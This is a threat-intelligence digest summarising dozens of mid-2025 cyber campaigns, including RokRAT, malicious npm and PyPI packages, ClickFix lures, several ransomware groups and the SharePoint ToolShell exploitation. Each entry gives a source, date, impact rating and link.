Summary:: Researchers at Genians have discovered a new cyber-espionage campaign linked to the North Korea group APT37, involving an updated version of their RokRAT malware that operates entirely in memory. The attack begins when a user opens a malicious LNK file, which silently executes a PowerShell script that injects hidden code into legitimate programs like Notepad or Paint. In a recent variant, the attackers employed steganography by embedding second stage payload inside JPEG images to evade detection. The malware communicates with C2 servers using cloud storage platforms such as Dropbox, pCloud, and Yandex Disk facilitating data exfiltration via revoked access tokens.

Source: https://www.genians.co.kr/en/blog/threat_intelligence/rokrat_shellcode_steganographic

Intel Source:: Fortinet

Intel Name:: Malicious_NPM_and_PyPI_Packages

Date of Scan:: 2025-08-04

Impact:: LOW

Summary:: Researchers at FortiGuard Labs have discovered a series of malicious open-source packages uploaded to the NPM and PyPI repositories. These packages leverage minimal file structures, lack repository links, and execute scripts at install time to silently deploy encrypted payloads. The identified packages named - simple-mali-pkg, confighum, sinontop-utils, solana-sdkpy, and postcss-theme-vars (v7.0.7) execute obfuscated Python or JavaScript code during installation to harvest browser-stored credentials and cryptocurrency wallet keys. The stolen data is exfiltrated to attacker-controlled servers via encrypted WebSocket or HTTP channels. These attacks mainly target developers and end users who unknowingly include these packages in their projects. If successful, the attackers can gain access to sensitive systems.

Source: https://www.fortinet.com/blog/threat-research/malicious-packages-across-open-source-registries

Intel Source:: ISC.SANS

Intel Name:: Scattered_Spider_Domain_Spoofing_Surge

Date of Scan:: 2025-08-04

Impact:: MEDIUM

Summary:: Researchers at ISC.SANS have observed Scattered Spider registering deceptive domain names that mimic legitimate enterprise services to support social engineering operations. The threat actor, already profiled in recent CISA advisories, demonstrates continued reliance on brand impersonation and credential harvesting tactics to gain unauthorized access to target networks. SANS analysis identified recurring patterns in newly registered domains that suggest preparation for phishing campaigns or pretext-based attacks, though no active exploitation has yet been confirmed. The emergence of new naming conventions, not previously reported, reflects a shift in tradecraft and indicates the actor’s operational flexibility.

Source: https://isc.sans.edu/diary/Scattered+Spider+Related+Domain+Names/32162

Intel Source:: CloudSEK

Intel Name:: Fake_ClickFix_Pages_Spread_Epsilon_Red_Ransomware

Date of Scan:: 2025-07-31

Impact:: MEDIUM

Summary:: CloudSEK researchers have discovered that since July 2025, threat actors have been tricking users worldwide into executing malicious .HTA files through fake ClickFix verification pages impersonating popular platforms like Discord, Twitch, and OnlyFans to deploy Epsilon Red ransomware. Users who follow the on-screen prompts unknowingly activate an ActiveXObject that uses a hidden curl-and-execute command to silently download and run the payload. This campaign relies on social engineering and browser-based compromise, rather than traditional phishing emails, allowing it to evade download protections and raise less suspicion. Once executed, the malware initiates web-based C2 communication over TCP port 2269, resulting in full ransomware deployment. The method enables remote code execution and data encryption without user awareness, leading to severe operational disruption and financial loss.

Source: https://www.cloudsek.com/blog/threat-actors-lure-victims-into-downloading-hta-files-using-clickfix-to-spread-epsilon-red-ransomware

Intel Source:: Esentire

Intel Name:: Cyber_Stealer_Malware_as_a_Service

Date of Scan:: 2025-07-31

Impact:: MEDIUM

Summary:: Researchers at eSentire have observed the emergence and rapid evolution of Cyber Stealer, a sophisticated Malware-as-a-Service (MaaS) first identified in May 2025. Developed by an actor operating under the alias “Cyber Products,” the malware is actively maintained and updated in response to user feedback on underground forums, signaling an agile development lifecycle and customer-driven feature roadmap. Written in C#, Cyber Stealer is capable of stealing credentials, session data, autofill content, and files from a wide range of applications including browsers, cloud storage, password managers, gaming clients, messaging platforms, and cryptocurrency wallets. It employs evasive techniques such as PowerShell-based Windows Defender bypass, DNS spoofing via hosts file manipulation, and clipboard hijacking for crypto theft.

Source: https://www.esentire.com/blog/cyber-stealer-analysis-when-your-malware-developer-has-fomo-about-features

Intel Source:: Crowdstrike

Intel Name:: Supply_Chain_Attack_via_Scavenger_Malware

Date of Scan:: 2025-07-30

Impact:: MEDIUM

Summary:: According to CrowdStrike’s analysis, on July 18, 2025 an unknown adversary compromised multiple popular NPM packages to deploy a two‑stage loader dubbed “Scavenger” that targets developer environments. Attackers gained access by phishing an NPM maintainer with a spoofed login page and typosquatted domain before injecting a first‑stage JavaScript installer that invokes a malicious DLL via rundll32.exe. Once loaded, the Scavenger DLL harvests NPM credentials and browser data before dropping a second‑stage infostealer payload, risking credential theft and exposure of proprietary development assets. Exploitation of the open NPM ecosystem amplifies impact across on‑premise and cloud‑based infrastructure and challenges detection. CrowdStrike Falcon blocked the threat at initial execution through behavior‑based detections and quarantine of the malicious components.

Source: https://www.crowdstrike.com/en-us/blog/crowdstrike-falcon-prevents-npm-package-supply-chain-attacks/

Intel Source:: Imperva

Intel Name:: ToolShell_Zero_Day_in_SharePoint

Date of Scan:: 2025-07-30

Impact:: HIGH

Summary:: Imperva Threat Researchers have observed active exploitation of CVE-2025-53770, a critical deserialization vulnerability in on‑premises SharePoint Server 2016, 2019 and Subscription Edition that permits unauthenticated remote code execution. Campaigns began immediately after Microsoft’s July 2025 Patch Tuesday release and have scanned tens of thousands of sites across 34 countries. Clusters tracked as Linen Typhoon and Violet Typhoon, linked to China, have chained ToolShell with privilege escalation and spoofing exploits to deploy web shells, harvest credentials and maintain persistent access.

Source: https://www.imperva.com/blog/imperva-customers-protected-against-critical-toolshell-zero%e2%80%91day-in-microsoft-sharepoint/

Intel Source:: Krebsonsecurity

Intel Name:: SilverTerrier_BEC_Targets_Aviation_Execs

Date of Scan:: 2025-07-30

Impact:: MEDIUM

Summary:: Researchers at KrebsOnSecurity have identified an ongoing business email compromise (BEC) campaign orchestrated by the Nigerian cybercrime group SilverTerrier, targeting executives in the transportation and aviation sectors. The operation begins with a phishing lure that impersonates a Microsoft 365 login page, capturing executive credentials. Once inside the victim's inbox, the attackers exfiltrate invoice-related communications, fabricate near-identical invoices, and send them to customers using lookalike domains registered just hours after compromise. At least one customer was deceived into transferring a six-figure sum to the attackers. Infrastructure analysis links these spoofed domains to a threat actor known as “Justy John,” whose aliases and contact information appear in hundreds of domain registrations tied to previous BEC scams.

Source: https://krebsonsecurity.com/2025/07/phishers-target-aviation-execs-to-scam-customers/

Intel Source:: ASEC

Intel Name:: RokRAT_Distribute_through_Malicious_Hangul_Document

Date of Scan:: 2025-07-29

Impact:: LOW

Summary:: ASEC researchers have identified a malware strain known as RokRAT which is being distributed through malicious Hangul Word Processor (HWP) documents, commonly used in South Korea. These documents impersonate content related to North Korea’s grain sales office and contain a deceptive link labelled Reference material.docx. When clicked, , the document triggers a hidden process that silently executes a legitimate program (ShellRunas.exe) alongside a malicious DLL file (crediu.dll). The DLL then connects to Dropbox to download a JPG image that secretly contains malicious code that is used to activate RokRAT directly in memory, without leaving traces on disk. Once active, RokRAT enables attackers to collect sensitive user data and remotely control the compromised system.

Source: https://asec.ahnlab.com/ko/89116/

Intel Source:: Cyfirma

Intel Name:: Telegram_Driven_Raven_Stealer

Date of Scan:: 2025-07-29

Impact:: MEDIUM

Summary:: Researchers from CYFIRMA have identified Raven Stealer, a lightweight Delphi/C++-based infostealer leveraging Telegram for real-time data exfiltration. Promoted through a GitHub repository and Telegram channel operated by the ZeroTrace Team, Raven enables low-skill actors to steal browser credentials, payment data, and session cookies from Chromium-based browsers via in-memory DLL injection and reflective process hollowing. The malware launches browsers in suspended mode, bypasses sandboxing, and decrypts payloads directly into memory, avoiding disk writes and user detection. Exfiltrated data is archived and uploaded through Telegram’s API using embedded bot tokens and chat IDs, allowing attackers to maintain anonymity and evade traditional C2 detection. Raven’s modular builder, UPX packing, and obfuscation techniques streamline campaign deployment and detection evasion.

Source: https://www.cyfirma.com/research/raven-stealer-unmasked-telegram-based-data-exfiltration/

Intel Source:: Seqrite

Intel Name:: UNG0901_Targets_Russian_Entities

Date of Scan:: 2025-07-29

Impact:: LOW

Summary:: Researchers at SEQRITE Labs have uncovered a cyber-espionage campaign orchestrated by the threat group UNG0901, which targets entities in Russia's aerospace and defense sectors. The attackers deliver spear-phishing emails containing a malicious .EML attachment impersonates a Russian logistics center. Upon opening, the email drops a deceptive document that deploy a hidden shortcut (.LNK) file which silently executes PowerShell and Rundll32 to activate a custom malware called EAGLET. Once active, EAGLET collects system and network details, then establishes communication with its C2 server using HTTP disguised as traffic from the Microsoft App Store. It can execute remote command execution, file exfiltration, and automated transmission of collected data.

Source: https://www.seqrite.com/blog/operation-cargotalon-ung0901-targets-russian-aerospace-defense-sector-using-eaglet-implant/

Intel Source:: Fortinet

Intel Name:: Evacuatio_Flight_Scam

Date of Scan:: 2025-07-29

Impact:: LOW

Summary:: FortiGuard researchers uncovered a phishing campaign that exploited the Middle East conflict by registering the domain lineageembraer.online, impersonating a luxury airline offering emergency evacuation flights from Tel Aviv to New York. The fraudulent site displayed seats for $2,166 each and included a Book Now button along with an Instruction link that delivered a PDF hosted on a Shopify CDN, both designed to harvest Personal information and banking credentials. Upon Clicking on Book Now button opened a pre-filled email draft addressed to lineageembraer@gmail.com, while the instruction link downloaded a PDF that requested sensitive data such as passport numbers and home addresses other high-value identity information.

Source: https://www.fortinet.com/blog/threat-research/a-special-mission-to-nowhere

Intel Source:: KB4ThreatLabs

Intel Name:: Compromised_SendGrid_Account_Phishing_Campaign

Date of Scan:: 2025-07-28

Impact:: MEDIUM

Summary:: KnowBe4 researchers have uncovered an active phishing campaign, ongoing since July 2025, that leverages compromised SendGrid accounts to target other SendGrid customers. The attackers use technical-themed lures—such as “API Errors Impacting Email Delivery” and “Webhook Endpoint Unresponsive”—to trick recipients into submitting credentials on fake “settings adjustment” pages. By reusing stolen credentials, threat actors expand their access to trusted sending platforms, effectively bypassing SPF/DKIM verification and boosting email deliverability. The use of subject lines tailored to SendGrid’s technical audience increases credibility and click-through rates, enabling mass credential harvesting. The campaign’s self-propagating nature significantly amplifies its reach, raising the risk of account takeovers and data exfiltration across a broader network.

Source: https://x.com/Kb4Threatlabs/status/1948364376236601487

Intel Source:: Socket

Intel Name:: NPM_Phishing_Campaign_Targets_Developers

Date of Scan:: 2025-07-28

Impact:: LOW

Summary:: Researchers at Socket discovered a phishing campaign where attackers impersonate the official npm support team by leveraging a typosquatted domain closely resembling the legitimate one. The primary objective is to steal developers’ login credentials and access tokens, potentially allowing them to compromise the software supply chain. The attackers replicated the official npm login page and embedded unique tracking tokens to track victims and autofill their details. The campaign primarily targets maintainers of popular npm packages, potentially impacting approximately 34 million weekly downloads.

Source: https://socket.dev/blog/npm-phishing-email-targets-developers-with-typosquatted-domain

Intel Source:: Eagle Eye Threat Intelligence

Intel Name:: Silver_Fox_Rootkits_Exploit_Expired_Signatures

Date of Scan:: 2025-07-28

Impact:: MEDIUM

Summary:: Researchers at Eagle Eye Threat Intelligence Center have identified a new variant of the “Silver Fox” malware campaign, characterized by the deployment of multiple kernel-mode rootkits using expired or weakly validated digital signatures. Initially detected by the Kingsoft Antivirus team, the threat manifests through anomalous user behavior such as autonomous mouse movements and mass virus file dissemination. The malware is distributed via counterfeit installers mimicking legitimate software (e.g., CMake), containing signed drivers such as rdwdrv.sys, Cndom6.sys, Xiaoh1.sys, and NSedKrn1.sys. These drivers abuse outdated or forged certificates from Chinese firms, enabling stealthy kernel-level API hooking (via InfinityHook), network stack manipulation, and process termination without triggering user access controls.

Source: https://mp.weixin.qq.com/s?__biz=MzU2OTcxNjE4Mw==&mid=2247486072&idx=1&sn=ce36707ae3974cc872b4432a8edf2dee&poc_token=HGdFg2ijMJ92hAeDFnft9JkNk3itOnTghTuuI-QI

Intel Source:: 360 Threat Intelligence Center

Intel Name:: DarkHotel_Targets_Windows_via_Fake_Installers

Date of Scan:: 2025-07-28

Impact:: MEDIUM

Summary:: Researchers at the 360 Threat Intelligence Center have discovered that since October 2024, the North Korean–linked threat actor APT-C-06 (DarkHotel) has been distributing malicious input-method installer programs—initially “hana9.30\_x64\_9.exe” and later “winrar-x64-540.exe”—via Baidu Netdisk, WeChat, and USB drives to compromise Windows systems ranging from XP to Server 2008. Once executed, these installers drop a second-stage DLL (DarkSeal) into the execution directory, establish persistence through a scheduled task that launches a legitimate-looking copy-machine program, and spawn a dllhost.exe process that performs shellcode injection, replacing its executable with a trusted binary. DarkSeal then leverages DLL hijacking and XOR decryption to reflectively load either a Meterpreter or Thinmon payload, providing covert remote access. The group continues to use a final-stage payload that has remained unchanged since 2022, enabling stealthy, long-term persistence and potential data exfiltration.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507142&idx=1&sn=e22c82e0641be2e7db4310d60668fd2b&poc_token=HCA2g2ijPliapwTTVuVa9AHf-jCacGsQSnSk9s49

Intel Source:: Solar 4RAYS

Intel Name:: Proxy_Trickster_Targets_Servers_for_Profit

Date of Scan:: 2025-07-27

Impact:: LOW

Summary:: Researchers at Solar 4RAYS have identified ongoing activity by the financially motivated hacker group Proxy Trickster, active since early 2024 and targeting public-facing servers worldwide to monetize compromised infrastructure through proxyjacking and cryptocurrency mining. The group exploits known vulnerabilities in services like Selenium Grid and uses weak SSH credentials to gain initial access and root privileges. Once inside, they deploy multi-stage Bash and PowerShell scripts to replace system utilities (ps, pstree, pkill), hide malicious processes, and maintain persistence using cron jobs on Unix and scheduled tasks on Windows. Between 2024 and 2025, Proxy Trickster has compromised hundreds of servers in 58 countries, including the U.S., Germany, Russia, and China, even demonstrating the ability to exploit hypervisors for enhanced resource hijacking. Their proxyjacking activities, involving bandwidth resale via platforms like Packetshare, Honeygain, and Trafficmonetizer, have significantly outperformed their mining operations, generating over $3,400 in revenue within a year.

Source: https://rt-solar.ru/solar-4rays/blog/5714/

Intel Source:: Cisco Talos

Intel Name:: Chaos_Ransomware_Group

Date of Scan:: 2025-07-27

Impact:: MEDIUM

Summary:: Cisco Talos researchers have uncovered a new ransomware group called Chaos, which operates under a Ransomware-as-a-Service (RaaS) model. This group has been active since early 2025 and leverages voice phishing and stolen credentials to infiltrate victim networks. Once inside, they quickly encrypt files and steal sensitive data, demanding ransom for decryption while threatening to leak stolen data or launch DDoS attacks. Chaos targets organizations across various sectors globally, with confirmed victims in the U.S., U.K., India, and New Zealand. They abuse legitimate tools like Microsoft Quick Assist for remote access and RMM software such as AnyDesk and ScreenConnect for persistence and lateral movement. Additionally, researchers believe Chaos may be a rebranded version of the BlackSuit (formerly Royal) ransomware group, based on similarities in tools, attack methods, and ransom notes.

Source: https://blog.talosintelligence.com/new-chaos-ransomware/

Intel Source:: ASEC

Intel Name:: Gunra_Ransomware_with_Dedicated_Leak_Sites

Date of Scan:: 2025-07-27

Impact:: MEDIUM

Summary:: Gunra ransomware surfaced in April 2025, exploiting Conti’s leaked source code to deploy a new Dedicated Leak Site (DLS) infrastructure and pressure victims into rapid negotiation. According to AhnLab TIP’s analysis, the group orchestrates multi‑threaded file encryption using ChaCha20 and RSA public‑key routines before deleting volume shadow copies to inhibit recovery. Its execution thread scales to available CPU cores and targets Windows systems exclusively, dropping a ransom note named R3ADM3.txt to direct victims to a Tor‑based payment portal. Motivated by financial extortion, Gunra refines social engineering by enforcing victim response within five days, heightening urgency. The emergence of multiple Gunra DLS instances between April and June 2025 signals an evolving threat landscape likely to expand leak postings and automation.

Source: https://asec.ahnlab.com/en/89206/

Intel Source:: Slowmist (Medium)

Intel Name:: Malicious_Solana_Trading_Bot_Steals_Private_Keys

Date of Scan:: 2025-07-27

Impact:: MEDIUM

Summary:: Researchers at SlowMist have identified a malicious open-source Solana trading bot, deceptively distributed via GitHub, designed to exfiltrate private wallet keys from unsuspecting users. The project, disguised as a legitimate trading tool under the repository pumpfun-pumpswap-sniper-copy-trading-bot, abuses social engineering and code obfuscation to lure victims into execution. Upon launch, the bot harvests the victim’s private key from a local .env file and sends it to a hardcoded command-and-control (C2) server operated by the attacker. The attack leverages the create_coingecko_proxy() function to perform the exfiltration while masking the malicious intent with seemingly benign API interactions.

Source: https://slowmist.medium.com/threat-intelligence-an-analysis-of-a-malicious-solana-open-source-trading-bot-ab580fd3cc89

Intel Source:: CISA

Intel Name:: Interlock_Ransomware_Using_ClickFix_Tactic

Date of Scan:: 2025-07-26

Impact:: MEDIUM

Summary:: A joint advisory has been issued by the FBI, CISA, HHS, and MS-ISAC related to Interlock ransomware actors deploy a clickjacking social engineering tactic dubbed ClickFix to trick users into executing a Base64-encoded PowerShell payload. These actos gain initial access via drive-by compromises on legitimate websites, masquerading malicious payloads as browser or security-software updates. Upon gaining access, the threat actor leverage PowerShell to conduct reconnaissance, establish persistence via registry run-key modifications, and harvest credentials using keyloggers and browser-stealer binaries. The group exfiltrates data to Microsoft Azure Storage using AzCopy prior to the deployment of file encryption on both Windows and Linux systems using AES/RSA and FreeBSD ELF encryptors. The primary targets include businesses and critical infrastructure entities across North America and Europe.

Source: https://www.cisa.gov/sites/default/files/2025-07/aa25-203a-stopransomware-interlock-072225.pdf

Intel Source:: Cofense

Intel Name:: Fake_Zoom_Call_Lures

Date of Scan:: 2025-07-26

Impact:: LOW

Summary:: Cofense researchers discovered a phishing campaign where attackers simulate Zoom connection issues to deceive users into revealing their Zoom Workplace credentials. The threat actors send urgent-themed spear-phishing emails with deceptive meeting URLs that redirect victims through several steps to a convincing fake Zoom login page. After displaying a fraudulent connection timed out message, the page asks the user to log in again to capture their email, password, IP address and location. The stolen information is exfiltrated through a Telegram bot. After gaining valid SSO credentials, the attackers can gain a foothold within targeted organizations, enabling lateral movement and establishing persistent access.

Source: https://cofense.com/blog/fake-zoom-call-lures-for-zoom-workplace-credentials

Intel Source:: Miscellaneous

Intel Name:: Recent_Themed_Social_Engineering_Campaigns

Date of Scan:: 2025-07-26

Impact:: LOW

Summary:: Researchers have identified three active campaigns exploiting user trust and popular platforms. FoxyWallet, uses over 40 fake Firefox extensions to impersonate crypto wallets like MetaMask and Coinbase, stealing seed phrases and private keys. Prime Day phishing campaign using fake Amazon domains and urgent emails to harvest login and payment credentials. Meanwhile, a CAPTCHA-based social engineering campaign, tricks users into executing clipboard-injected PowerShell scripts, leading to malware installation after virtual environment checks are bypassed.

Source: http://www.securonix.com

Intel Source:: Esentire

Intel Name:: PureRAT_Delivers_Via_Ghost_Crypt

Date of Scan:: 2025-07-25

Impact:: LOW

Summary:: Researchers at eSentire uncovered a campaign that employed a new encryption tool called Ghost Crypt to deliver a PureRAT through PDF link hosted on Zoho WorkDrive, targeting a certified public accounting firm in the United States. The attackers impersonate a new client to trick the victim into downloading a ZIP archive containing malicious EXE and a DLL file encrypted with Ghost Crypt. Once executed, the DLL injects PureRAT into a legitimate Windows process (csc.exe) using a technique called process hypnosis. After running, PureRAT collects system details, hardware identifiers, data from cryptocurrency apps, and browser extensions, and then exfiltrates the information to an attackers-controlled server via secure encrypted channel.

Source: https://www.esentire.com/blog/ghost-crypt-powers-purerat-with-hypnosis

Intel Source:: ASEC

Intel Name:: New_Windows_Malware_Campaign

Date of Scan:: 2025-07-25

Impact:: MEDIUM

Summary:: Researchers at ASEC have uncovered a campaign targeting Windows users through malicious LNK files disguised as security verification messages from card companies. When opened, these files execute a hidden script that loads malicious code directly into memory without being saved to disk. The malware then injects itself into browsers and system processes to operate stealthily. It uses separate modules to capture sensitive data—one steals login credentials and records keystrokes, while another acts as a backdoor, enabling remote command execution, file access and data exfiltration.

Source: https://asec.ahnlab.com/ko/89126/

Intel Source:: Datadog

Intel Name:: Mimo_Targets_Magento_based_Ecommerce_Platforms

Date of Scan:: 2025-07-25

Impact:: LOW

Summary:: Datadog researchers have identified that the Mimo threat actor, also known as Mimo’lette, is targeting Magento-based ecommerce platforms and publicly exposed Docker Engine APIs. The group exploits an unidentified vulnerability in PHP-FPM to gain initial access via reverse shell injection. Mimo’s primary objective is financial gain through cryptomining using a customized XMRig miner connected to C3Pool and proxyjacking by reselling victims’ bandwidth via IPRoyal Pawns. To maintain persistence, Mimo leverages encrypted tunneling with GSocket along cron-based task scheduling and in-memory payload execution using memfd_create to evade disk-based detection and forensics.

Source: https://securitylabs.datadoghq.com/articles/beyond-mimolette-tracking-mimo-expansion-magento-cms-docker/

Intel Source:: Akamai

Intel Name:: SharePoint_Unauthenticated_ToolPane_RCE

Date of Scan:: 2025-07-23

Impact:: HIGH

Summary:: A critical remote code execution vulnerability in SharePoint’s ToolPane.aspx component places on-premises servers at immediate risk. According to Akamai Security Intelligence Group’s telemetry, Microsoft’s July 19, 2025 disclosure of CVE-2025-53770 revealed that over 20 percent of observed environments—particularly legacy SharePoint 2010 and 2013 instances remain unpatched. Attackers deliver a malformed HTTP header to bypass authentication, then exploit a deserialization flaw (CVE-2025-49704) via a malicious ASPX payload to extract MachineKey values and sign arbitrary VIEWSTATE chains for stealthy execution in w3wp.exe.

Source: https://www.akamai.com/blog/security-research/2025/jul/sharepoint-vulnerability-rce-active-exploitation-detections-mitigations

Intel Source:: ASEC

Intel Name:: Malicious_LNK_Infostealer_via_Credit_Card_Pop_Up

Date of Scan:: 2025-07-23

Impact:: MEDIUM

Summary:: Researchers at ASEC have observed a campaign deploying malicious LNK shortcuts disguised as credit card authentication prompts to install infostealer and backdoor components. Discovered July 22, 2025, the attack leverages a decoy HTML file that, upon execution, triggers an HTA script to retrieve a reflective-loading DLL (sys.dll) and associated modules into the user’s AppData\Local directory. The DLL injects “app” and “net” payloads into browser processes (Chrome, Edge, Opera, Firefox) to harvest stored credentials and communication tokens, while a keylogging backdoor logs keystrokes and maintains covert remote access.

Source: https://asec.ahnlab.com/en/89156/

Intel Source:: Microsoft

Intel Name:: Chinese_Actors_Exploiting_SharePoint_Vulnerability

Date of Scan:: 2025-07-23

Impact:: HIGH

Summary:: Researchers from Microsoft have observed that Chinese state-sponsored threat actors including Linen Typhoon, Violet Typhoon and Storm-2603 are actively exploiting critical on-premises Microsoft SharePoint vulnerabilities to gain unauthorized remote code execution and deploy web shells for data collection . The attackers leverage CVE-2025-49706 and CVE-2025-49704 to bypass authentication and CVE-2025-53770 and CVE-2025-53771 to execute remote code execution on internet-facing SharePoint servers. Post-exploitation activities, the attackers deploy custom ASPX web shells (spininstallo.aspx) to retrieve MachineKey configuration data and exfiltrate it via HTTP requests. The primary targets are organizations running supported versions of on-premises SharePoint Server, including Subscription Edition, 2019, 2016.

Source: https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/

Intel Source:: ASEC

Intel Name:: Advanced_Version_of_ACRStealer

Date of Scan:: 2025-07-23

Impact:: LOW

Summary:: ASEC researchers have discovered a more advanced version of the ACRStealer info-stealing which is designed to secretly exfiltrate sensitive data from compromised systems, including browser credentials, cryptocurrency wallets, FTP and cloud storage credentials, and documents repositories. It leverages a technique called DeadDropResolver (DDR) to hide its C2 servers inside Google Docs and Steam and establishes a stealthy communication channel using a custom socket driver to bypass library-based monitoring. The malware encrypts configuration data using a combination of Base64, RC4, and AES-256-CBC encryption. Additionally, it communicates with multiple C2 endpoints for retrieving payloads, determining routes, and exfiltrating stolen data over HTTP/HTTPS, using spoofed domains like microsoft.com and avast.com.

Source: https://asec.ahnlab.com/ko/89115/

Intel Source:: Fortinet

Intel Name:: NailaoLocker_Cheese_Ransomware

Date of Scan:: 2025-07-22

Impact:: MEDIUM

Summary:: FortiGuard Labs have identified a high-severity variant of NailaoLocker ransomware dubbed “Cheese” targeting Microsoft Windows environments and encrypting nearly all accessible user files with AES-256-CBC and embedded SM2 cryptographic keys to extort victims for illicit financial gain. Delivered through a DLL sideloading chain involving a legitimate usysdiag.exe dropper and a malicious sensapi.dll loader, the malware leverages an IO completion port–based, multi-threaded architecture to traverse logical drives, encrypt data, and drop ransom notes without disrupting critical system paths.

Source: https://www.fortinet.com/blog/threat-research/nailaolocker-ransomware-cheese

Intel Source:: Unit42 and Sentinelone

Intel Name:: Active_ToolShell_SharePoint_Exploits

Date of Scan:: 2025-07-22

Impact:: HIGH

Summary:: According to SentinelOne and Unit42’s analysis, multiple adversary clusters have targeted on-premises Microsoft SharePoint servers since mid-July 2025 by chaining legacy CVE-2025-49704/49706 flaws with the zero-day bypass CVE-2025-53770/53771, known as ToolShell. Initial hands-on exploitation deployed a password-protected ASPX webshell before advancing to the reconnaissance utility spinstallIO.aspx and ultimately a fileless .NET module that extracts MachineKey cryptographic secrets for credential forging and persistence. Attackers leveraged a logic flaw in SharePoint’s ToolPane.aspx Referer validation to achieve unauthenticated remote code execution, then executed in-memory PowerShell and .NET payloads to move laterally and maintain stealth. Victims included high-value organizations in technology consulting, manufacturing, critical infrastructure, and professional services, indicating strategic targeting of engineering and architecture assets.

Source: https://www.sentinelone.com/blog/sharepoint-toolshell-zero-day-exploited-in-the-wild-targets-enterprise-servers/ https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/

Intel Source:: ASEC

Intel Name:: SVF_DDoS_Botnet_via_SSH_Compromise

Date of Scan:: 2025-07-22

Impact:: LOW

Summary:: Researchers at ASEC have observed threat actors exploiting weak SSH credentials on unmanaged Linux servers to deploy a Python-based DDoS framework dubbed SVF. In mid-July 2025, AhnLab Security Intelligence Center’s analysts discovered that SVF leverages automated dictionary attacks to seize SSH access, then installs a lightweight Python agent that connects to a Discord channel for command-and-control. The malware dynamically harvests and validates public HTTP proxies to orchestrate both Layer 7 HTTP floods and Layer 4 UDP amplification, rapidly scaling attack volume with minimal footprint.

Source: https://asec.ahnlab.com/en/89083/

Intel Source:: Picus Security

Intel Name:: GLOBAL_GROUP_Ransomware

Date of Scan:: 2025-07-21

Impact:: MEDIUM

Summary:: Researchers at Picus Security have uncovered that GLOBAL GROUP is a rebranded evolution of the Mamona RIP and Black Lock ransomware families, now operating as a Ransomware-as-a-Service (RaaS) platform. This threat actor delivers Golang-compiled, cross-platform binaries that leverage ChaCha20-Poly1305 encryption to lock files and enforce a double-extortion model, threatening to publish stolen data if ransom demands are not met. The platform allows affiliates to customize key parameters, including file extensions (.lockbitloch), filename encryption, and optional destructive flags such as self-deletion, log erasure, and process termination—demonstrating operational maturity. Victims include corporate environments—one confirmed case involved RDP access to a U.S. law firm secured by an Initial Access Broker—indicating a focus on professional services networks. Impact potential is severe: encrypted business-critical data, reputational damage, multi-million-dollar ransom demands facilitated by an AI-driven Tor negotiation portal, and pervasive affiliate scaling. GLOBAL GROUP’s integration of automated negotiations, API-exposed SSH credentials, and modular payload generation underscores both sophistication and OPSEC liabilities.

Source: https://www.picussecurity.com/resource/blog/tracking-global-group-ransomware-from-mamona-to-market-scale

Intel Source:: Eye Security

Intel Name:: Unauthenticated_SharePoint_RCE_Exploitation

Date of Scan:: 2025-07-21

Impact:: HIGH

Summary:: According to Eye Security, the ToolShell chain (CVE-2025-53770) enables unauthenticated remote code execution against on-premises SharePoint servers, resulting in stealthy deployment of a crypto-exfiltration payload called spinstall0.aspx . The exploit combines a SignOut.aspx referer bypass with a vulnerability in the ToolPane.aspx endpoint to drop a PowerShell-based ASPX web shell. The shell extracts the SharePoint MachineKey and ValidationKey, allowing attackers to craft signed __VIEWSTATE tokens via ysoserial for full RCE without credentials. Dozens of servers across multiple regions were compromised within hours, demonstrating the campaign’s scale and speed. Extraction of cryptographic keys undermines authentication, enabling forgery of subsequent payloads and domain-wide access. Successful exploitation threatens lateral movement, data theft, and persistent backdoor access. Microsoft has yet to issue a patch, making immediate detection and mitigation critical.

Source: https://research.eye.security/sharepoint-under-siege/

Intel Source:: The DFIR Report

Intel Name:: KongTuke_FileFix_Interlock_RAT_Variant

Date of Scan:: 2025-07-20

Impact:: MEDIUM

Summary:: Researchers at The DFIR Report have observed a new PHP-based variant of the Interlock RAT deployed via KongTuke FileFix web-injection campaigns since May 2025, with the PHP payload first identified in June 2025. The Interlock ransomware group compromises legitimate websites to inject a single-line HTML snippet that performs IP-filtered redirection and presents a deceptive CAPTCHA prompt to lure users into executing a PowerShell command which drops a PHP binary into the AppData\Roaming directory.

Source: https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/

Intel Source:: CERT-UA

Intel Name:: LAMEHUG_LLM_Reconnaissance_Tool

Date of Scan:: 2025-07-20

Impact:: MEDIUM

Summary:: Researchers from CERT-UA have observed APT operators designated UAC-0001 deploy malicious email attachments on 10 July 2025 posing as official ministry correspondence to deliver a PyInstaller-compiled loader. That loader installs LAMEHUG, a Python-based framework leveraging the Qwen 2.5-Coder-32B LLM via a public API to generate and execute contextual reconnaissance commands. Subsequent iterations broadened its AI-driven exfiltration routines and extended search capabilities. Operators abused a compromised email account and legitimate cloud infrastructure to evade detection on Windows NT 10.0 x64 hosts. LAMEHUG harvests system inventories via native utilities (WMIC, systeminfo, ipconfig) and recursively locates, copies and stages Office and PDF documents for exfiltration.

Source: https://cert.gov.ua/article/6284730

Intel Source:: Sentinelone

Intel Name:: macOS_ZuRu_Termius_Trojan

Date of Scan:: 2025-07-20

Impact:: LOW

Summary:: According to SentinelOne’s analysis, a novel variant of the macOS.ZuRu backdoor has emerged through a trojanized version of the cross-platform SSH client Termius, delivering a modified Khepri C2 beacon that establishes persistent, stealthy access on macOS endpoints. First observed in May 2025, this campaign repackages legitimate Termius.app bundles with additional Mach-O binaries and a Khepri loader, leveraging LaunchDaemon persistence and deprecated AuthorizationExecuteWithPrivileges calls to escalate privileges. The modified beacon employs DNS-based communication on port 53 with decoy domains and an Alibaba Cloud C2, supporting file transfer, system reconnaissance, process control, and command execution.

Source: https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/

Intel Source:: Palo Alto

Intel Name:: CL_STA_1020_Targeting_Government_Entities

Date of Scan:: 2025-07-19

Impact:: MEDIUM

